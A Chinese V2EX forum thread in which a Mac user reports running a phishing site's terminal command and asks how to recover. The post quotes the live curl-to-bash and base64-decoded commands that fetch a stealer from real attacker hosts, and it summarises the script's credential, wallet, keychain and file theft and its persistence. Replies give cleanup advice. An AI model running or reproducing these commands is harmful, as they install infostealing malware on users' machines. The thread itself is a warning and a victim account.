下载 Mac 软件执行了一个钓鱼脚本怎么办?怎么避免自己的账户和财产受损?

5 天前
 neetz

趁周末没事折腾了一下自己的 Mac ,下了一堆乱七八糟的软件

刚刚有个网站给了我一个命令,要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

感觉是熬夜脑子不清醒了,我真就傻乎乎输入密码执行了脚本,听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

看到这个命令的时候,脑子都凉了,把脚本喂给 Gemini 告诉我说会去执行以下命令

  1. 窃取密码 🔑 它会弹出一个伪造的系统对话框,谎称“需要安装应用助手”,诱骗你输入电脑的开机密码。如果你不输入正确的密码,这个对话框会一直骚扰你。

  2. 窃取加密货币钱包 💰 (主要目标) 浏览器钱包: 它有一个庞大的列表,专门扫描并窃取数十种加密货币钱包浏览器插件的数据,例如 MetaMask 、Phantom 、Trust Wallet 等。

桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据,例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

  1. 窃取各类浏览器数据 🌐 它会攻击市面上几乎所有的主流浏览器( Chrome, Safari, Firefox, Edge, Brave, Opera 等)。

窃取内容包括:保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

  1. 窃取个人敏感文件 📄 钥匙串 (Keychain): 复制你整个系统钥匙串文件,里面可能包含你的 Wi-Fi 密码、应用密码等。

备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

本地文件: 扫描你的“桌面”和“文稿”文件夹,专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

  1. 打包上传,发送给黑客 📤 它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

然后将这个文件上传到黑客的服务器( IP 地址为 185.93.89.62 ,和你之前那个脚本是同一个地址)。

  1. 植入后门并替换正常程序 🚪 持久化后门: 它会用你输入的密码,在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑,这个恶意软件也会自动运行,让黑客可以持续控制你的电脑。

程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

这个是不是只能重装系统了?我还要做什么来保护自己的账户吗

2404 次点击
所在节点    Apple
34 条回复
moudy
4 天前
@dilidilid 醒醒,谁告诉你 brew 是给开发者用的。n 多有用的软件你去搜官网都是让你 brew 安装。这玩意就是第二个 appstore 。shell 脚本最终能做的也就那些事。读取敏感文件,安装 daemon ,替换 library 或关键 binary 。行为识别已经能卡住大部分恶意脚本了。
dilidilid
4 天前
@moudy 你说的那 n 多软件基本都是开源软件,开源软件本身就存在更多的供应链风险,你用沙箱测试能规避吗?
我说开发者可能有点极端了,但 brew 确实基本上都是 Pro 用户在用,你可以问问非 Pro 用户买 Mac 的有几个装了 homebrew 。
作为一个佐证,brew 最近一年 install_on_request 事件一共只有一亿次不到,这是包括全平台以及每个包被安装都会计数,homebrew 的 macOS 实际活跃用户估计也就在千万水平,和 macOS 的总体用户规模相去甚远
dilidilid
4 天前
@moudy 你说的行为识别,Windows
dilidilid
4 天前
@moudy 你说的行为识别是杀毒软件的需求,Windows 也是默认这么做的,代价就是性能和 IO 耗损以及误杀,这也是很多人抱怨 Windows 文件系统性能差的一个重要原因。mac 平台上的“供应链投毒”显然没有到需要牺牲流畅度去这么做的程度,如果真的特别在意可以在 Mac 上安装第三方杀毒软件
MYDB
4 天前
1.物理断网
2.抢救一些重要资料(每个文件都自己过目一遍,不要让 AI 帮你)
3.重装系统和软件,如果有 nas 备份可以从那里还原,但系统自带的还原就不要相信了
4.联网,一一修改密码
aero99
4 天前
Mac 上那个有个防火墙软件忘了名字了,装上可以阻止一部分陌生 ip 访问或者询问
tamakiui
4 天前
debian 软件源从来不用考虑这个,第三方软件+sudo 命令行就要警惕了。
Linioi
4 天前
我一个朋友前几天就是傻乎乎执行了这个脚本,他是被一个 Cloudflare 验证界面骗了,我还笑了他好几天,没想到 V2EX 又撞到一个一模一样的😂
AoEiuV020JP
4 天前
这真能盗走加密钱包吗, 我看钱包插件之类的都是隔一会儿就要解密才能使用,数据没理由明文保存吧,
hackpro
4 天前
哪个网站 爆出来避个雷
EchoJose
4 天前
看来 Mac 破解软件还是得少下载,尽量找开源的。
gefangshuai
4 天前
好奇心驱使我看到你的帖子后也执行了。。。
到了输入密码那一步我停下了
whirlcache
4 天前
刚跟着 B 站装了最新学习版的 Lightroom 的我瑟瑟发抖。。。
nextvay
3 天前
举报下,英国的 IP

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://ex.noerr.eu.org/t/1166698

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX